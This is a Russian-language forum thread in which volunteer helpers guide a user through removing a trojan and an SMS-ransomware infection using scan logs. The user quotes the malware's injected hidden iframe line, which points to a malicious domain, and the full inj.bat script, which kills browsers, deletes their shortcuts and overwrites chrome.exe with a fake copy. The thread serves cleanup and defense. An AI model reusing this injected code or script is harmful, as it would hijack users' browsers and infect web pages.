как удалить остатки трояна?

[Олег Морозов]

вчера комп поймал трояна. в каждум *.htm и *.php файле на компе была дописана строка
"p
<nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
"
. антивирус нод32 нашел около 30000 таких страниц, но вылечить не смог. удалять эти страницы я не хочу, т.к. они нужны. снес нода, поставил касперского кристал. провел полную проверку системы. касперский нашел и удалил 9 троянове, но он эти страницы как вредоносные не помечает. но при каждом вызове страницы блокирует доступ компа к адресу из конца страницы. как избавиться от последствий? нужны ли вам протоколы авз и HijackThis?

[Info_bot]

Уважаемый(ая) Олег Морозов, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Олег Морозов]

выкладываю файлы
Вложение 397514
Вложение 397515
Вложение 397516

[Techno]

C:\Documents and Settings\User\Главное меню\Программы\Автозагрузка\WCLOCK32.EXE - Ваше?

- Сделайте лог полного сканирования MBAM.

[Олег Морозов]

C:\Documents and Settings\User\Главное меню\Программы\Автозагрузка\WCLOCK32.EXE да, это моё. это часики. у меня щас делается сканирование малваребайтом. винт на терабайт, поэтому долгая песня. появилась еще одна проблема, смс вымогатель не пускает в интернет, на сайты связанные с безопасностью (касперский, доктор веб, вирусинфо и т.д.). как от него избавиться??? помогите

в автозагрузке ничего подозрительного не нашел.

- - - Добавлено - - -

Вложение 397908 вот лог сканирования

- - - Добавлено - - -

к сожалению, надпись "ничего не удаляйте не посоветовавшись с хелперами" увиел только после того как удалил малваребайтом найденные объекты. не пинайте сильно

[Techno]

Вы все удалили в MBAM?

[Олег Морозов]

не все. там отмечены файлы, относящиеся к навигации, их оставил

- - - Добавлено - - -

после 7-ми часов простоя компа изменился файл hosts. чо то бред какой то происходит

[Techno]

- Сделайте лог RSIT

[Олег Морозов]

вот пожалуйста
Вложение 398046
Вложение 398047

[Techno]

C:\WINDOWS\tasks\At1.job - удалите.

Больше ничего необычного.

[Олег Морозов]

а как быть с блокировкой доступа на сайты, посвященные безопасности? у меня при заходе на них вываливается всплывающее окно, в котором говорят отправить смс.... щас пишу вам с другого компа, т к исходный комп не ходит на этот сайт.
и еще хотелось бы убрать то, о чем писалось в первом сообщении. может есть какой скриптик? чтоб перешерстил все файлы на компе и убрал из них строчки ?
"p
<nofollow><iframe src="http://tsm.25u.com/local.html" width="0" height="0" frameborder="0"></iframe></nofollow>
"
просто на компе стоит фтп сервер, и при открытии консоли управления антивирь ругается, что я пытаюсь пройти по ссылкеtsm.25u.com/local.htm. а она вроде как небезопасна.

[Олег Морозов]

я тут давеча смотрел порты открытые и вот что заметил.
Вложение 398065
насколько я знаю надпись backdoor ничо хорошего не сулит.
что посоветуете?

- - - Добавлено - - -

еще нарыл в логах rsit что в виндовской папке появилась папка upd. посмотрел ее содержимое и закрались подозрения что дело нечисто
Вложение 398066
и с хромом проблемы начались. не запускается. а вместо ярлыка на настоящий хром на рабочем столе появился ярлык на поддельный хром
Файл inj.bat:

Скрытый текст

if exist zhopras.cpl (goto second) else goto first
:first
echo nahuy>zhopras.cpl
goto inj

:second
if exist end.txt (goto udl) else goto scht

:udl
del /f /q end.txt
copy /y desktop.dll counter.bat
call counter.bat
goto inj

:scht
call counter.bat
goto exit

:inj
taskkill /f /im iexplore.exe /T
start ie.vbs
if exist "%ProgramFiles%\Opera\Opera.exe" (goto oper) else goto next
:oper
del /f /q /s "C:\Documents and Settings\Opera.lnk"
del /f /q /s "d:\Documents and Settings\Opera.lnk"
del /f /q /s "e:\Documents and Settings\Opera.lnk"
del /f /q /s "f:\Documents and Settings\Opera.lnk"
taskkill /f /im opera.exe /T
start opera.vbs
:next
if exist "%ProgramFiles%\Mozilla Firefox\firefox.exe" (goto ffox) else goto next1
:ffox
del /f /q /s "C:\Documents and Settings\Mozilla Firefox.lnk"
del /f /q /s "d:\Documents and Settings\Mozilla Firefox.lnk"
del /f /q /s "e:\Documents and Settings\Mozilla Firefox.lnk"
del /f /q /s "f:\Documents and Settings\Mozilla Firefox.lnk"
taskkill /f /im firefox.exe /T
start fire.vbs
:next1

taskkill /f /im chrome.exe /T

for /f "tokens=*" %%i in ('dir /a:d /b "%userprofile%\.."') do (copy /y "chrome.exe" "%userprofile%\..\%%i\Local Settings\Application Data\Google\Chrome\Application\chrome.exe")


taskkill /f /im GoogleUpdate.exe
del /f /q /s "C:\Documents and Settings\GoogleUpdate.exe"
del /f /q /s "%ProgramFiles%\Google\GoogleUpdate.exe"
taskkill /f /im GoogleUpdateBroker.exe
del /f /q /s "C:\Documents and Settings\GoogleUpdateBroker.exe"
del /f /q /s "%ProgramFiles%\Google\GoogleUpdateBroker.exe"
taskkill /f /im GoogleUpdateHelper.msi
del /f /q /s "C:\Documents and Settings\GoogleUpdateHelper.msi"
del /f /q /s "%ProgramFiles%\Google\GoogleUpdateHelper.msi"
taskkill /f /im GoogleUpdateOnDemand.exe
del /f /q /s "C:\Documents and Settings\GoogleUpdateOnDemand.exe"
del /f /q /s "%ProgramFiles%\Google\GoogleUpdateOnDemand.exe"
taskkill /f /im GoogleUpdateSetup.exe
del /f /q /s "C:\Documents and Settings\GoogleUpdateSetup.exe"
del /f /q /s "%ProgramFiles%\Google\GoogleUpdateSetup.exe"

if exist "%ProgramFiles%\Google\Chrome\Application\chrome.exe" (goto chrom) else goto next2
:chrom
del /f /q /s "C:\Documents and Settings\Google Chrome.lnk"
del /f /q /s "d:\Documents and Settings\Google Chrome.lnk"
del /f /q /s "e:\Documents and Settings\Google Chrome.lnk"
del /f /q /s "f:\Documents and Settings\Google Chrome.lnk"
taskkill /f /im chrome.exe /T
start chrome.vbs

:next2
if exist "%ProgramFiles%\Safari\Safari.EXE" (goto safar) else goto next3

:safar
del /f /q /s "C:\Documents and Settings\Safari.lnk"
del /f /q /s "d:\Documents and Settings\Safari.lnk"
del /f /q /s "e:\Documents and Settings\Safari.lnk"
del /f /q /s "f:\Documents and Settings\Safari.lnk"
taskkill /f /im safari.exe
start safari.vbs
:next3





:exit

Скрыть

[Techno]

ie.vbs - а такие файлы есть?

- Сделайте лог ComboFix.

[Олег Морозов]

ie.vbs таких файлов не нашел

лог комбофикса Вложение 398173

[Techno]

Изменения есть?

192.168.0.1 - роутер? Проверяйте настройки на предмет вредоносных DNS?

[Олег Морозов]

ну в общем и целом пока все логи делал, сам же их и читал. местами замечал всякие подозрительности. чо то сам удалил, чо то программы удалили. осталось поправить все мои *.htm файлы, чтоб ту самую ссылку из них удалить. подскажите отимальный вариант исправления файлов? может скрипт какой подскажете или программу?

192,168,0,1 это роутер

а где копать насчет подозрительных днс? в настройках роутера?

[Techno]

а где копать насчет подозрительных днс? в настройках роутера?

Да.

- Удалите ComboFix.

[Олег Морозов]

в настройках роутера только 1 dns нашел - тот который мне выдал провайдер (dns сервер)

[Techno]

В логах больше ничего необычного.